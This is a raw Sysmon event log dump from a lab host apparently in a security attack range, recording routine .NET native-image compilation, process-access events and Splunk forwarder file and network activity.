21:01:37.665{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A202-00000000CF01}6304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18F9031C47B2BC1A7AEC124A4D24804C,SHA256=DE7AFEE0E95B026674D30C7EAB9409D82457F92E078F85913913CB522210242D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.243{4DB9351A-A129-60D3-A102-00000000CF01}4836NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EDK0AXEBI5\System.Web.ni.dll.auxMD5=F8AD7C55BD73001D2ABBFD25A56FDF57,SHA256=3F7C57298CF04770828EB9AAF75691E752FD9B2B59E36C2C9308BB5DA3A688C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.243{4DB9351A-A129-60D3-A102-00000000CF01}4836NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\EDK0AXEBI5\System.Web.ni.dllMD5=A5967BB34924692D20292BA544BBB6CB,SHA256=E409F1536D700E1552B833EF490C9BB3FA846B0B4AF376B920034BB2F9E6ED5C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7625E9E47EA07A5B0CA004BCAE284B8F,SHA256=E44148852265361BA7A3100DFF5338EC7485EF4C0E8E8559D4BC9A13A82CD2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=830044ADB3561456754B8276CECA896E,SHA256=E22A5C07E167DE6C5785BC48B9FD76A7A190380CA691E414C7A9D626E553F9DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D7BE60F3E22DDE81B8A98A0C8A1B63C,SHA256=927D979FF5F1035224BDB7462D4AB7F5E6351A155B77434586B5AEC331BAB585,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.368{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.353{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.353{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.134{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A132-60D3-A602-00000000CF01}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.118{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A132-60D3-A602-00000000CF01}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.118{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A132-60D3-A602-00000000CF01}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.056{4DB9351A-A131-60D3-A502-00000000CF01}6424NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UHSZBK3EFO\System.Web.ApplicationServices.ni.dll.auxMD5=D9CBD86D572568560F63592AC4C45C93,SHA256=7B7E84C37B8A3F6D2AA3AE51921EA5D6595579658118B997E8252C545220DDF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:38.056{4DB9351A-A131-60D3-A502-00000000CF01}6424NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UHSZBK3EFO\System.Web.ApplicationServices.ni.dllMD5=286C07A028634A73B9FFB83E5247D444,SHA256=CAC8B2F728B72A35338483555779FD35703C7ADAA4166F45C887210275FA9059,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:38.040{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1918-0\System.Web.ApplicationServices.dll2021-06-23 21:01:38.040 23542300x800000000000000019130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:39.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C42807AADE63F782DBB0DD6B2BFC5C,SHA256=08029F0CD6E600EF83350CEC3029D925533C746DC7C42BB94C6B1D211921838A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:39.056{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:39.093{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61373-false10.0.1.12-8089- 23542300x800000000000000019131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:40.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=024FB29C3FB4925F941012097FCFECCD,SHA256=56EEC5851366856F33317E70E36808AC26FE5151528BD90E5F25DB76724C1943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.948{4DB9351A-A135-60D3-A902-00000000CF01}5548NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTCVD0RH5N\System.Web.DataVisualization.Design.ni.dll.auxMD5=ECD6113E5E6E7F270445B13107E3EE5F,SHA256=2F99FE05612470C6BD9010C190AF69512CD8D2425C3D050C930BB7791E6D990E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.948{4DB9351A-A135-60D3-A902-00000000CF01}5548NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTCVD0RH5N\System.Web.DataVisualization.Design.ni.dllMD5=2CAB8D641662E975AB8E342F7012C92E,SHA256=217C870462F687C5E4C461BB3430D043AB2B53AB3E67679F2FDE5913DA5C528A,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:41.931{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15ac-0\System.Web.DataVisualization.Design.dll2021-06-23 21:01:41.931 354300x800000000000000019143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:40.156{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61374-false10.0.1.12-8000- 10341000x800000000000000019142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.697{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.681{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.681{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A135-60D3-A902-00000000CF01}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.587{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A135-60D3-A802-00000000CF01}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.572{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A135-60D3-A802-00000000CF01}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.572{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A135-60D3-A802-00000000CF01}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E186070E8391CB5F13932ED4C2228C4,SHA256=CF02946BDD9680E7B7404376E70073CC4EEC766D1C344CAE999EB917FB78B10F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.462{4DB9351A-A132-60D3-A702-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5JP8MHJSOD\System.Web.DataVisualization.ni.dll.auxMD5=DE2622A49A0D9055B93FD3BAF139D158,SHA256=AFCFB35EA94AC24E7AE8F1353CBC45E2501B51F2D32A8EFB5876A9D6AB82C9B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:41.462{4DB9351A-A132-60D3-A702-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5JP8MHJSOD\System.Web.DataVisualization.ni.dllMD5=FF1228BCF16D430D1112FAB270410537,SHA256=DA4850A9B5EAD8C28365CE1FACF4D74FBA5A403C59565C1ED835F978BD6818BF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:41.386{4DB9351A-A132-60D3-A702-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1938-0\System.Web.DataVisualization.dll2021-06-23 21:01:41.368 23542300x800000000000000019154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.728{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7625E9E47EA07A5B0CA004BCAE284B8F,SHA256=E44148852265361BA7A3100DFF5338EC7485EF4C0E8E8559D4BC9A13A82CD2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.525{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D51A2A702F63BA4C7EBA42D0DA02B74B,SHA256=07B440D3E132CBED0E15FC59A9963205EC7351D39610494B94987BC0C4865C5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:42.306{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A136-60D3-AB02-00000000CF01}5300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 